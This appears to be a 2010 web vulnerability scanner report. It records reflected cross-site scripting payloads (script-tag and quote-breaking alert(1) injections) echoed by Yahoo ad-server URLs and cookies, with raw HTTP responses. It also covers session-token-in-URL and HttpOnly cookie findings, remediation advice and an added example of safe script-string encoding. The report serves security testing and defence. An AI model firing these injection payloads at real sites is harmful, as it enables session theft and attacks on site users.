Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b0002050f<script>alert(1)</script>73af24b663c</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69d87<script>alert(1)</script>2a366561973 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex69d87<script>alert(1)</script>2a366561973/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64?noredirect=1
x-ysws-request-id: 79b462be-4226-4b13-a824-1f997cf1c875
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex69d87<script>alert(1)</script>2a366561973/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48540<script>alert(1)</script>217c78c52fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore48540<script>alert(1)</script>217c78c52fb/a41b7019-ffe4-4441-82ec-999ddc10ec64?noredirect=1
x-ysws-request-id: 73a4e556-858c-42f8-807e-e0d15a7f3858
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore48540<script>alert(1)</script>217c78c52fb/a41b7019-ffe4-4441-82ec-999ddc10ec64</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c108c<script>alert(1)</script>570b7354d5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64c108c<script>alert(1)</script>570b7354d5e?noredirect=1
x-ysws-request-id: c6c3466b-8aee-4a98-bae2-9a94957d35c4
Date: Mon, 15 Nov 2010 02:47:12 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64c108c<script>alert(1)</script>570b7354d5e</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a75c4<script>alert(1)</script>3236a6f7778 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexa75c4<script>alert(1)</script>3236a6f7778/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3?noredirect=1
x-ysws-request-id: 80bbecdc-07c5-4be0-aa30-20e086f932a3
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexa75c4<script>alert(1)</script>3236a6f7778/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dd3f<script>alert(1)</script>c25bad628d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore2dd3f<script>alert(1)</script>c25bad628d9/c3d92b61-4f57-4cda-87bb-1d308db151c3?noredirect=1
x-ysws-request-id: ce3eed25-f0e5-4337-a483-ffcea5f1e897
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore2dd3f<script>alert(1)</script>c25bad628d9/c3d92b61-4f57-4cda-87bb-1d308db151c3</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4889c<script>alert(1)</script>bd01896ef8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c34889c<script>alert(1)</script>bd01896ef8d?noredirect=1
x-ysws-request-id: 7966be1f-402f-4475-9f86-2a5bf34a992c
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c34889c<script>alert(1)</script>bd01896ef8d</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35f66<script>alert(1)</script>03feef5848f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex35f66<script>alert(1)</script>03feef5848f/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7?noredirect=1
x-ysws-request-id: 4b4db4f0-cc16-4c67-89cb-083a5f6f659b
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex35f66<script>alert(1)</script>03feef5848f/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8e3c6<script>alert(1)</script>6664911f33e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore8e3c6<script>alert(1)</script>6664911f33e/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7?noredirect=1
x-ysws-request-id: c0d5e7c2-744b-4626-b294-d6921b23f0f4
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore8e3c6<script>alert(1)</script>6664911f33e/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f9155<script>alert(1)</script>deb24b2d7e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7f9155<script>alert(1)</script>deb24b2d7e1?noredirect=1
x-ysws-request-id: 6ea46e1c-4f8d-4752-a991-02fdad921114
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7f9155<script>alert(1)</script>deb24b2d7e1</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adf32<script>alert(1)</script>faf1cec383c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexadf32<script>alert(1)</script>faf1cec383c/template/swfobject.js?noredirect=1
x-ysws-request-id: 30bec40f-c3e5-4dac-9147-d4ac008b1e89
Date: Sun, 14 Nov 2010 23:03:19 GMT
Connection: close
Content-Length: 144

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexadf32<script>alert(1)</script>faf1cec383c/template/swfobject.js</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7bd9<script>alert(1)</script>184d12aba62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/templatef7bd9<script>alert(1)</script>184d12aba62/swfobject.js?noredirect=1
x-ysws-request-id: af0206e1-96cf-4726-84da-c38a55d749c2
Date: Sun, 14 Nov 2010 23:03:26 GMT
Connection: close
Content-Length: 144

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/templatef7bd9<script>alert(1)</script>184d12aba62/swfobject.js</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84b03<script>alert(1)</script>bbf8e977d32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/template/swfobject.js84b03<script>alert(1)</script>bbf8e977d32?noredirect=1
x-ysws-request-id: b3fd4a8e-6a6a-48fd-802f-cd012299c0ec
Date: Sun, 14 Nov 2010 23:03:32 GMT
Connection: close
Content-Length: 144

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/template/swfobject.js84b03<script>alert(1)</script>bbf8e977d32</p>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3d55"-alert(1)-"44ea32a63f7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value should be serialised as a JavaScript string literal (for example with a JSON encoder) and every character that could end the literal or the enclosing script block, including quotation marks, backslashes, the characters <, > and &, and the line terminators U+2028 and U+2029, should be written as a \uXXXX escape. Escaping quotation marks alone is not sufficient, because the HTML parser ends a script block at the first </script sequence it sees regardless of JavaScript string state.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e084"-alert(1)-"4983a1bcc5f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7158"-alert(1)-"c2fb6388161 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f826"-alert(1)-"e1bc5f2c148 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the bev cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fac0</script><script>alert(1)</script>41e5e875679 was submitted in the bev cookie. This input was echoed unmodified in the application's response. Unlike the ruid payloads above, this payload does not need to break out of the string: the HTML parser ends the script block at the first </script sequence regardless of JavaScript string state, so escaping quotation marks alone would not have prevented it.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
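The following is an added illustration written for this edit, not code from the report or from the applications it tests, of the remediation detail above. It takes the bev and ruid payloads from the findings and compares quotation-mark escaping alone (which the </script> payload defeats) with JSON serialisation plus \uXXXX escaping of the characters that the HTML tokenizer and the JavaScript parser treat specially. The variable names and the renderInlineScript template are assumptions standing in for whatever server-side template produces the inline script.

```javascript
// Added example (not from the report): embedding an untrusted value such as
// the bev or ruid cookie inside an inline <script> block.

// Naive approach: escape backslashes and double quotes only.
function naiveQuoteEscape(value) {
  return '"' + String(value).replace(/\\/g, '\\\\').replace(/"/g, '\\"') + '"';
}

// Hardened approach. JSON.stringify handles quotes, backslashes and control
// characters; the replacements cover what it leaves alone:
//  - "<", ">" and "&", so that "</script" (or "<!--") can never appear
//    literally: the HTML tokenizer closes the script block at the first
//    "</script" it sees, regardless of JavaScript string state;
//  - U+2028 / U+2029, which older JS engines treat as line terminators
//    inside string literals.
function encodeForScriptString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Render the inline script the way a server-side template would
// (assumed template; the real one is not shown in the report).
function renderInlineScript(varName, value, encoder) {
  return '<script>var ' + varName + ' = ' + encoder(value) + ';</script>';
}

// Count script-block terminators as an HTML tokenizer would see them.
// Exactly one (the intended closing tag) means the value stayed inside
// the string literal.
function scriptTerminatorCount(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Payloads taken from the findings above.
const BEV_PAYLOAD = '1fac0</script><script>alert(1)</script>41e5e875679';
const RUID_PAYLOAD = 'd3d55"-alert(1)-"44ea32a63f7';

function demo() {
  return {
    // quote escaping leaves two extra "</script" terminators in the page
    naiveBev: scriptTerminatorCount(renderInlineScript('bev', BEV_PAYLOAD, naiveQuoteEscape)),
    // \u escaping leaves only the intended closing tag
    hardenedBev: scriptTerminatorCount(renderInlineScript('bev', BEV_PAYLOAD, encodeForScriptString)),
    // the escaped form still decodes to the original value
    roundTrip: JSON.parse(encodeForScriptString(BEV_PAYLOAD)) === BEV_PAYLOAD,
    // the ruid payload is contained by either encoder, which is why quote
    // escaping looks adequate until a "</script" payload is tried
    naiveRuid: scriptTerminatorCount(renderInlineScript('ruid', RUID_PAYLOAD, naiveQuoteEscape)),
  };
}

console.log(demo());
```

The hardened encoder is context-specific: it makes a value safe as a JavaScript string literal inside a script block, and the variable it produces must still be HTML-encoded or otherwise handled correctly when the script later writes it into the DOM.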
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm ...[SNIP]... s = "We suggest unchecking a couple filters, zooming out, or searching for a different city.";
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /m2/fisherinvestments/mbox/standard?mboxHost=www.fi.com&mboxSession=1289795137202-209168&mboxPage=1289795137202-209168&screenHeight=1200&screenWidth=1920&browserWidth=1525&browserHeight=904&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=FI_Home_Page&mboxId=0&mboxTime=1289773537206&mboxURL=http%3A%2F%2Fwww.fi.com%2F&mboxReferrer=http%3A%2F%2Ffi.com%2F&mboxVersion=39 HTTP/1.1
Host: fisherinvestments.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fi.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 15 Nov 2010 04:27:08 GMT
Server: Test & Target
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>StoreGrid Professional Edition Pricing | Vembu StoreGrid | Remote Backup Sof ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26705B4E85010E89-400001068000283F[CE]; Expires=Sat, 14 Nov 2015 04:27:09 GMT; Domain=fisherinvestments.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435?[AQB]&ndh=1&t=14/10/2010%2022%3A25%3A38%200%20360&ns=fisherinvestments&pageName=Home&g=http%3A//www.fi.com/&r=http%3A//fi.com/&cc=USD&ch=Home&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1525&bh=904&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: fisherinvestments.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.fi.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60x7Dyqx60fubqxxuzpxxqx7Dgafq=[CS]v4|26592C6C851D182D-40000105803C8570|4CB258D7[CE]; s_vi_lojlx7Bdx7Enbx60chz=[CS]v4|266BA10085012300-40000108C0005B7D|4CD74200[CE]; s_vi_iixxmhx7Fnmox7E=[CS]v4|266BA12D05010B60-60000102C0001E38|4CD74259[CE]; s_vi_bx7Bhx7Fx7Eybnfx23nbx60=[CS]v4|266D5F9B85011F45-60000114C0008F4A|4CDABF35[CE]; s_vi_kjodgjid=[CS]v4|2670313405010FB8-6000011760028933|4CE06266[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26704C3805013F28-400001076003F251|4CE0986E[CE]
Response
HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 04:27:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26705B4E85010E89-400001068000283F[CE]; Expires=Sat, 14 Nov 2015 04:27:09 GMT; Domain=fisherinvestments.112.2o7.net; Path=/
Location: http://fisherinvestments.112.2o7.net/b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435?AQB=1&pccr=true&vidn=26705B4E85010E89-400001068000283F&&ndh=1&t=14/10/2010%2022%3A25%3A38%200%20360&ns=fisherinvestments&pageName=Home&g=http%3A//www.fi.com/&r=http%3A//fi.com/&cc=USD&ch=Home&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1525&bh=904&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3
Expires: Sun, 14 Nov 2010 04:27:09 GMT
